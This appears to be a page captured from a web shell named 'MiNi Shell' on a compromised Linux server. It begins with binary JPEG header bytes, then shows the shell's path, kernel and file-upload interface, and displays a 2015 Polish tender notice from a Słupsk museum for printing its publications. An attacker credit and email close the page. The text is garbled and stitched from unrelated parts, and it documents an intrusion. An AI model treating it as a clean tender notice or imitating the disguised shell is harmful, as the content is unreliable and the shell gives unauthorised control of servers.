JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150330/70680-N-2015.html

<p class="kh_header"><b>Słupsk: Druk z dostawą wydawnictw dla potrzeb Muzeum Pomorza Środkowego w Słupsku w 2015 r.</b><br>
<b>Numer ogłoszenia: 70680 - 2015; data zamieszczenia: 30.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Pomorza Środkowego w Słupsku , ul. Dominikańska 5-9, 76-200 Słupsk, woj. pomorskie, tel. 059 8424081/82 w. 320, 8463020, faks 059 8426518.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk z dostawą wydawnictw dla potrzeb Muzeum Pomorza Środkowego w Słupsku w 2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:  przedmiotem zamówienia są sukcesywne usługi poligraficzne wraz z dostawą  oraz usługą przygotowania projektu, składu, druku, adiustacji tekstu, sprawdzenia pod względem językowym i gramatycznym  wydawnictw tj.: książek, albumów, katalogów, tek edukacyjnych, przewodników, informatorów, zeszytów, folderów dla potrzeb Muzeum Pomorza Środkowego w Słupsku (Zamawiającego) w 2015r. jak poniżej:
Lp. OPIS PRZEDMIOTU ZAMÓWIENIA	 J.m.	  Nakład
1.	Tytuł publikacji: Teka edukacyjna dla oddziału w Słupsku 
(projekt, skład, łamanie, druk)
Format: A4
Kolor: pełny jednostronny
Ilość stron wydawnictwa: 20 kart + teczka
Rodzaj papieru wydawnictwa: karton 360g/m2, 
Rodzaj papieru okładki: teczka karton biały 360 g/m2     + lakier
ISBN 	szt.	300
2.	Przewodnik po MPŚ w języku niemieckim 
(projekt, skład, łamanie, druk)
Format: A 5
Kolor: pełny
Ilość stron: 48 + 4
Rodzaj papier: kreda błysk 150g/m2
Rodzaj papieru okładki: kreda mat 300 g/m2   , folia mat
Oprawa: szycie zeszytowe
ISBN	szt.	200
3.	Tytuł publikacji: Katalog MAX JOSHEPH - RABIN ZE SŁUPSKA
(projekt, skład, łamanie, druk)
format: B5
Kolor: pełny
Ilość stron wydawnictwa + okładka : 64 str. + okładka, 
Rodzaj papieru wydawnictwa: kreda mat 130 g/m2
Rodzaj papieru okładki: kreda mat 300 g/m2
Rodzaj oprawy: miękka klejona
ISBN	szt.	150
4.	Tytuł publikacji: Katalog  Witkaciana - Polska Szkoła Plakatu z kolekcji Działu Sztuki i Techniki Muzeum Pomorza Środkowego w Słupsku
(projekt, skład, łamanie, druk)
Format: A4 (210x297 mm)
Ilość stron: 32 strony (w tym 16 w kolorze, 16 czarno-białych w tym 4 ze zdjęciami) + 4 strony oprawy
Papier: kreda - środek gramatura 130 g/m2
Oprawa: karton błysk, gramatura 300g/m2, foliowana, 4+0, rodzaj oprawy miękki
ISBN	szt.	150
5.	Tytuł: Katalog do wystawy  Kultura Ludowa Podhala 
(projekt, skład, łamanie, druk)
Liczba stron: 32 + 4 str. oprawy
format: 20cm x 20cm
Papier: kreda błysk 150 g/m2
Okładka: sztywna biały karton 300 g/m2
Oprawa: szyta
ISBN	szt.	150
6.	Tytuł: Przewodnik MWS w Klukach 
( druk)
Format: B5
Kolor: pełny
Ilość stron + okładka: 80 +4  
Rodzaj papieru: kreda mat 150g/m2
Rodzaj papieru okładki: kreda 300 g/m2 foliowana, mat.
Rodzaj oprawy: miękka
ISBN 	szt.	700
7.	Tytuł: Katalog wystawy  U rymarza, cieśli, kołodzieja.
( druk)
format: B5
Kolor: pełny
Ilość stron wydawnictwa + okładka: 48 + 4 
Rodzaj papieru wydawnictwa:
Kreda mat 150 g/m2 
Rodzaj papieru okładki: kreda 300 g/m2 foliowana
Rodzaj oprawy: miękka
ISBN 	szt.	150
8.	Tytuł : Folder  W słowińskiej zagrodzie
( druk)
format: A5
Kolor: pełny
Ilość stron wydawnictwa: 16
Rodzaj papieru wydawnictwa: kreda mat 150g/m2 
ISBN
	szt.	2000
9..	Tytuł: Informator MWS
( druk)
Format: 296 x 630 mm, składane na 3
Kolor: pełny
Rodzaj papieru wydawnictwa: karton 280g/m2 
ISBN
szt.	1500
10.	Tytuł: Katalog Galeria Pomorskiego Malarstwa Plenerowego.
(druk)
Format: A5
Kolor: pełny
Ilość stron wydawnictwa: 16
Rodzaj papieru wydawnictwa:
Kreda mat 150 g/m2 
ISBN 
szt.	1000
11.	Tytuł: Informator  Lekcje muzealne w Czystej
(druk)
Format: A5
Kolor: pełny
Ilość stron wydawnictwa: 8
Rodzaj papieru wydawnictwa: kreda mat 150g/m2 
ISBN 
	szt.	300
12.	Tytuł: Informator lekcje muzealne
(projekt, skład druk)
Format B5 
Rodzaj papieru:  kreda 150 g/m2,
Stron 16, 
Kolor: pełny
ISBN
	szt.	150
13.	Tytuł : Książka  XIII Konferencja Kaszubsko-Pomorska
(druk)
Format: 230  x 165 mm
Rodzaj papieru: środek: 80 g/m2; okładka: 350g/m2 (foliowana)
Ilość stron: 480
Kolor: pełny
ISBN
	szt.	200
14 	Tytuł: Katalog do wystawy  Zatrzymać czas
(projekt, skład, łamanie, druk)
Format: A4
Kolor: pełny
Ilość stron wydawnictwa: 32 + okładka
Rodzaj papieru wydawnictwa: kreda mat 150g/m2 
Rodzaj papieru okładki: karton 300 g/m2 foliowana
ISBN
	szt.	300
15..	Tytuł: Książka  Browarnictwo wiejskie na Pomorzu
(druk)
Format: 210x210mm
Kolor: pełny dwustronnie
Rodzaj papieru: kreda mat 170g, 64 stron
Okładka + 4 str.: twarda, klejona i szyta, lakierowana
ISBN
	szt.	250
16.	Tytuł: Broszura edukacyjna
(druk)
Format: 210 x 200 mm składane do DL
Ilość stron: 16 
Okładka: 4 strony 170g szyta
Kolor: pełny dwustronnie	
Rodzaj papieru: kreda mat. 150g/m2
ISBN
	szt.	500
17.	Tytuł:  Zeszyt ćwiczeń Dziecięca Zagroda
(druk)
Format: A 3 składane do A4 szyta
Ilość stron: 8 - po złożeniu
Kolor: czarno-biały	
Rodzaj papieru: ekologiczny, recyklingowy, ofset, gram. 180g/m2.
ISBN	szt.	400
18.	Tytuł: Album Swołowo Photo Day
( druk)
Format: wysokość 200 mm x szerokość: 230 mm
Ilość stron:64 
Kolor: pełny dwustronnie	
Rodzaj papieru: kreda mat 170g, 
Okładka: 4 str. Kreda mat. 340g, klejona i szyta, lakierowana
ISBN
	szt.	300
19.	Tytuł: Katalog wystawy Witkacy z Zakopanego (druk)
format: A4
Kolor:  wszystkie strony barwne
Okładka: I i IV strona barwne
Ilość stron wydawnictwa + okładka: 80 + 4
Rodzaj papieru wydawnictwa: biały, kreda mat, 150g/m2
Rodzaj papieru okładki: karton, ok. 300 g/m2
Rodzaj oprawy: klejenie, folia mat
ISBN 
 	szt.	600
20.	Tytuł: Katalog wystawy  Sola scriptura
(druk)
Format: A4
Kolor:  wszystkie strony barwne
Okładka: I i IV strona barwne
Ilość stron wydawnictwa + okładka: 128 + 4
Rodzaj papieru wydawnictwa: biały, kreda mat, 150 g/m2
Rodzaj papieru okładki: karton, ok. 300 g/m2
Rodzaj oprawy: klejenie, folia błysk
ISBN
	szt.	150
21.	Tytuł: Katalog wystawy  Numizmatyka III RP 
(druk)
Format: A5
Kolor: 64 strony barwne
Okładka: I i IV strona barwne
Ilość stron wydawnictwa + okładka: 64 + 4
Rodzaj papieru wydawnictwa: biały, kreda mat, 150 g/m2
Rodzaj papieru okładki: karton, ok. 300 g
Rodzaj oprawy: klejenie, folia błysk
ISBN	szt.	150
22.	Tytuł: Katalog wystawy  Poczet królów
(druk)
Format: A5
Kolor: 64 strony barwne
Okładka: I i IV strona barwne
Ilość stron wydawnictwa + okładka: 64 + 4
Rodzaj papieru wydawnictwa: biały, kreda mat, 150 g/m2
Rodzaj papieru okładki: karton, ok. 300 g/m2
Rodzaj oprawy: klejenie, folia błysk
ISBN	szt.	150
23.	Tytuł: Książka 50 lat kolekcji Witkacego  (druk)
format: A4
Kolor: 64 strony barwne
Okładka: I i IV strona barwne
Ilość stron wydawnictwa + okładka: 64 + 4
Rodzaj papieru wydawnictwa: biały, kreda mat, 150 g/m2
Rodzaj papieru okładki: karton, ok. 300 g/m2
Rodzaj oprawy: klejenie, folia błysk
ISBN	szt.	500
Realizacja usług odbywać się będzie sukcesywnie w oparciu o zapotrzebowanie Zamawiającego, na podstawie pisemnych zleceń, zawierających wyszczególnienie konkretnego zakresu prac do wykonania. Zamawiający wymaga aby realizacja usług, w zależności od rodzaju i zakresu prac wykonana była w terminach, jak poniżej:
 14 dni od momentu przekazania projektu do realizacji w zakresie druku katalogów, tek edukacyjnych, przewodników, informatorów, zeszytów (mniejsza ilość stron tj. do 80);  
 30 dni od momentu przekazania projektu do realizacji lub zatwierdzenia przez Zamawiającego projektu składu w zakresie książek, albumów, katalogów  (większa ilość stron tj. pow. 80).Do czasu wykonania druku wliczony jest czas potrzebny Zamawiającemu do dokonania akceptacji bądź korekty wydruków próbnych druków, a także czas potrzebny dla doręczenia prac Zamawiającemu w jego siedzibie. Czas dokonania przez Zamawiającego korekty wydruków próbnych druków określony zostanie w umowie w zakresie realizacji przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.40.00-6, 79.81.00.00-5, 79.82.25.00-7, 79.82.00.00-8, 79.97.12.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez wykonawców w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, stanowiącego załącznik Nr 3 do Specyfikacji Istotnych Warunków Zamówienia. Ocena spełnienia tego warunku odbędzie się zgodnie z formuła  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące posiadania wiedzy i doświadczenia.Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 usługi (na podstawie dwóch odrębnych  umów), polegające na: projekcie, składzie, druku książek, albumów, katalogów, tek edukacyjnych, przewodników, informatorów o wartości minimum 20 000,00 zł brutto;
Ocena spełnienia tego warunku odbędzie się na podstawie złożonego wykazu zrealizowanych zamówień z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały lub są wykonywane należycie, zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia stanowiącego załącznik  nr 3 do SIWZ. Ocena spełnienia tego warunku odbędzie się zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku odbywać się będzie zgodnie z formuła spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku odbywać się będzie zgodnie z formuła  spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Próbki (bezpłatne)  wykonanych dotychczas przez Wykonawcę przykładowych prac spełniających warunki określone w Rozdziale V, ust. 5.3. SIWZ, co najmniej 2 swoich wydawnictw o parametrach podobnych do podanych w SIWZ. 
W/w wydawnictwa książkowe muszą posiadać informację o wykonawcy druku oraz następujące parametry:
a)	informację o wykonawcy druku,
b)	objętość min. 64 strony,
c)	format nie mniejszy niż 155 mm x 240 mm do A4,
d)	papier: wnętrze - kreda matowa od 115g/m2 , okładka - kreda matowa od 250 g/m2 + folia,
e)	kolor: pełny,
f)	oprawę szytą lub klejoną.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Jakość wydruku - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umów w zakresie: 
1) ceny brutto oraz wysokości naliczonego podatku od towarów i usług, w przypadku zmiany ustawowej stawki podatku VAT (cena netto nie ulega zmianie),
2) nakładu wydawnictw określonych w umowie. Zmiana nakładu +/- 10% nie powoduje zmiany wynagrodzenia cen jednostkowych. 
3) ilości druku. Zamawiający w uzasadnionych przypadkach zastrzega sobie prawo odstąpienia od zlecenia druku wybranych wydawnictw w całości lub w części. W takim przypadku Zamawiający zobowiązany jest poinformować Wykonawcę o zmianie w terminie co najmniej 5 dni przed terminem dostarczenia druków. Wykonawcy w przypadku wprowadzenia w/w zmiany przysługuje jedynie wynagrodzenie z tytułu wykonanych druków.
4) liczby stron w zamawianych drukach. W taki  przypadku cena ulegnie zmianie proporcjonalnie do liczby stron. 
5) zmiana sposobu bigowania/ falcowania druków drobnych, pod warunkiem że zmiana ta nie spowoduje zmiany wartości ceny oferowanych druków.
6) zmiana tytułu danego druku, przy zachowaniu jego parametrów.
7) zmianie podwykonawcy lub zmiany zakresu prac zleconych podwykonawcy. 
Zmiany powyższe mogą być uzasadnione przyczynami prawnymi, organizacyjnymi i technicznymi. Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu, którą  to Wykonawca jest związany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum .slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Pomorza Środkowego w Słupsku, ul. Dominikańska 5-9, 76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2015 godzina 10:15, miejsce: Muzeum Pomorza Środkowego w Słupsku, ul. Dominikańska 5-9, 76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com